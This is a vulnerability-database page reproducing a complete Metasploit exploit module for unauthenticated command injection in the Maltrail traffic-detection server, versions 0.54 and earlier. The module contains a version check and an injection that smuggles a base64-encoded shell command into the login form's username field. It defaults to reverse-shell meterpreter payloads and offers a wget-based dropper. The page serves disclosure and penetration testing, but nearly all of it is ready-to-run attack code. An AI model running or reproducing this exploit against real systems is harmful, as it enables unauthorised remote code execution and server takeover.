Vulners
Lucene search
Maltrail Unauthenticated Command Injection
🗓️ 17 Aug 2023 19:51:20Reported by Ege BALCI <[email protected]>, Valentin Lobstein, Chris WildType 
metasploit🔗 www.rapid7.com👁 764 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2025-34073 | 16 Aug 202322:01 | – | circl |
 | maltrail 安全漏洞 | 2 Jul 202500:00 | – | cnnvd |
 | CVE-2025-34073 | 2 Jul 202513:46 | – | cve |
 | CVE-2025-34073 stamparm/maltrail <=0.54 Remote Command Execution | 2 Jul 202513:46 | – | cvelist |
 | EUVD-2025-19716 | 2 Jul 202513:46 | – | euvd |
 | Maltrail <=0.54 Username Parameter - Remote Command Execution | 4 Feb 202607:00 | – | nuclei |
 | CVE-2025-34073 | 2 Jul 202514:15 | – | nvd |
 | CVE-2025-34073 | 2 Jul 202514:15 | – | osv |
 | PT-2025-27631 | 2 Jul 202500:00 | – | ptsecurity |
 | CVE-2025-34073 | 4 Jul 202514:22 | – | redhatcve |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Maltrail Unauthenticated Command Injection',
'Description' => %q{
Maltrail is a malicious traffic detection system, utilizing publicly
available blacklists containing malicious and/or generally suspicious trails.
The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains
a command injection vulnerability in the `params.get("username")` parameter.
An attacker can exploit this vulnerability by injecting arbitrary OS commands
into the username parameter. The injected commands will be executed with the
privileges of the running process. This vulnerability can be exploited remotely
without authentication.
Successfully tested against Maltrail versions 0.52 and 0.53.
},
'License' => MSF_LICENSE,
'Author' => [
'Ege BALCI <egebalci[at]pm.me>', # msf module
'Valentin Lobstein', # Add CVE reference + rewrite
'Chris Wild', # original PoC, analysis
],
'References' => [
['CVE', '2025-34073'],
['EDB', '51676'],
['CVE', '2025-34073'],
['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
['URL', 'https://github.com/stamparm/maltrail/issues/19146']
],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => :wget,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DisclosureDate' => '2023-07-31',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)
register_options(
[
Opt::RPORT(8338),
OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'GET'
)
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}
if version < Rex::Version.new('0.54')
return CheckCode::Appears("Version Detected: #{version}")
end
CheckCode::Safe("Version Detected: #{version}")
end
def execute_command(cmd, _opts = {})
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'login'),
'method' => 'POST',
'uri_encode_mode' => 'none',
'headers' => {
'ctype' => 'application/x-www-form-urlencoded'
},
'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"
)
end
def exploit
case target['Type']
when :unix_cmd
print_status("Executing #{target.name}...")
execute_command(payload.encoded)
when :linux_dropper
print_status("Executing #{target.name}...")
execute_cmdstager
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2026 18:58Current
7.6High risk
Vulners AI Score7.6
CVSS 410
EPSS0.65833
SSVC